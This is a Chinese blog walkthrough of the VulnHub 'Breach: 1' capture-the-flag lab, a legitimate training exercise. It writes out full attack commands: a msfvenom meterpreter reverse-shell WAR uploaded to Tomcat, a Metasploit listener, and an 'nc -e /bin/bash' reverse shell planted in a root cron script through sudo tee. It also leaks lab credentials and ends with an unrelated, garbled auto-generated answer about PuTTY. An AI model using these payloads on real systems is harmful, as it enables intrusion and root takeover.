vulnhub靶场——BREACH: 1 渗透记录

BREACH: 1


BREACH: 1 :https://www.vulnhub.com/entry/breach-1,152/
下载: https://download.vulnhub.com/breach/Breach-1.0.zip

Description
First in a multi-part series, Breach 1.0 is meant to be beginner to intermediate boot2root/CTF(从启动boot到获取root权限和查看flag) challenge. Solving will take a combination of solid information gathering and persistence. Leave no stone unturned.
Virtual Machine
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
Networking
DHCP service: Disabled
IP address: 192.168.110.140

我猜这里的BREACH意思是让我们寻找突破口


一、信息搜集

fscan简单扫漏

./f -h 192.168.110.140
# [*] WebTitle:http://192.168.110.140    code:200 len:21     title:Welcome to Breach 1.0

image-20220129154817169

goby扫扫

image-20220129154807841



二、网站渗透

80端口有网站的

image-20220129143359794

查看源码有一堆base64的注释

image-20220129163101018

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
二次解码得到
pgibbons:damnitfeel$goodtobeagang$ta

还有一个跳转,往里翻翻看到有个 impresscms

image-20220129163139750

之前的base64就是用户密码

进去发现邮箱里面有个ssl密钥,192.168.110.140/.keystore

image-20220207140407820

找impresscms的漏洞,发现有sql注入,跨站脚本执行和本地文件包含漏洞,但都是在admin的情况下才可以执行,我们手里的用户不是admin,有的需要content页面但是被替换成一个gif了

点点发现这里也可以进content

1.流量包

image-20220207140909627

Content SSL implementation test capture (2016/6/4 21:37)

有个流量包可以下载

image-20220207141029777

http://192.168.110.140/impresscms/_SSL_test_phase1.pcap

看上面文章的内容知道和tomcat有关,可以用kali内置的keytool来解析之前得到的keystore

keytool基本使用

Keytool 是一个Java 数据证书的管理工具 ,Keytool 将密钥(key)和证书(certificates)存在一个称为keystore的文件中 在keystore里,包含两种数据:
密钥实体(Key entity)——密钥(secret key)又或者是私钥和配对公钥(采用非对称加密)
可信任的证书实体(trusted certificate entries)——只包含公钥

查看keystore内容

keytool -list -keystore [keystore]

根据下面的提示转成PKCS12标准

keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12

image-20220207142850113

不用写端口啥的,直接导入证书,就可以看到http的包了

image-20220207143212745

http流里面有用户密码

image-20220207144509398

dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
tomcat:Tt\5D8F(#!*u=G)4m7zB

2.tomcat

访问时候要注意协议是https,端口8443

image-20220207144347172

登陆进去是tomcat的管理页面,上传war包反弹shell

我用蚁剑菜刀的jsp🐎都连不了,可能是https的原因…所以用msf反弹shell(kali的IP:192.168.110.128)

1)生成war包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.110.128 lport=4444 -f war -o shell.war

image-20220207160005527

2)kali监听

msf6 payload(java/meterpreter/reverse_tcp) > use multi/handler
[*] Using configured payload java/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.110.128
lhost => 192.168.110.128
msf6 exploit(multi/handler) > set rport 4444
rport => 4444
msf6 exploit(multi/handler) > run

访问上传的war,需要等待一段时间

image-20220207160102746

image-20220207160148464



三、提权

上传文件失败,想用ping命令的suid提权也不行
然后看别人的wp发现是passwd得到明文密码,cat /etc/passwd可以看到可登陆的用户有三个:

image-20220207164122901

milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

很神奇,milton的密码是在mysql里面,查看/var/www可以看到php文件,里面mysql是无密码的

image-20220207170609311

查看mysql数据库

mysql -u root -p
Enter password: 
use mysql;
select user,password from user;
exit
然后看到user表里有milton密码
user    password
root
milton  6450d89bd3aff1d893b85d3ad65d2ec2
root
root
debian-sys-maint        *A9523939F1B2F3E72A4306C34F225ACF09590878

milton的密码:thelaststraw

但是milton没有什么东西,blumbergh的密码在http://192.168.110.140/images/bill.png图片里面

image-20220207170848576

blumbergh的密码:coffeestains

su登陆,这里要注意

无法执行su命令,显示需要一个终端,通过Python解决:

image-20220207171230120

python -c 'import pty;pty.spawn("/bin/bash")'

登陆blumbergh后history发现

history
    1  clear
    2  logoff
    3  logout
    4  exit
    5  cd /usr/share/cleanup
    6  cat tidyup.sh
    7  whoami
    …………

tidyup.sh

#!/bin/bash

#Hacker Evasion Script 
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.

cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf

使用 sudo -l 命令列出当前用户可执行的命令(这里我用一些找suid的命令找不到tee,不知道为啥)

image-20220207171333366


反弹root的shell

tidyup.sh能够以root权限运行,所以可以利用其反弹shell

1)先将nc反弹shell命令写入shell.txt文件

echo "nc -e /bin/bash 192.168.110.128 4443" > shell.txt

2)使用tee命令将shell.txt内容输出到tidyup.sh

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

查看tidyup.sh文件写入成功:

cat /usr/share/cleanup/tidyup.sh

image-20220207172231912

等个一会拿到root

image-20220207172635273

image-20220207172656715



参考wp:

靶机实战-Breach-1.0_滕财然的博客

VulnHub渗透测试实战靶场Breach 1.0

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
回答: 当您在使用PuTTY时,如果看到"WARNING - POTENTIAL SECURITY BREACH!"的警告信息,这可能是由于几种原因引起的。首先,这可能是因为您连接的服务器使用了较低的加密算法,而PuTTY检测到这可能存在安全风险。这是为了防止降级攻击。\[2\]其次,这可能是因为您连接的服务器返回了未分配的公共IP地址,这些地址通常可以被安全地阻止,因为它们不应该处于活动使用状态。\[1\]最后,PuTTY在某些平台上可能会在处理线条绘制字符时出现问题。\[3\]如果您遇到这个警告信息,建议您仔细检查服务器的安全性,并确保使用较高级别的加密算法来保护您的连接。 #### 引用[.reference_title] - *1* *3* [SG-1000使用指南](https://blog.csdn.net/weixin_33991727/article/details/89872893)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [PuTTY用户手册(十四)](https://blog.csdn.net/le_17_4_6/article/details/86522290)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值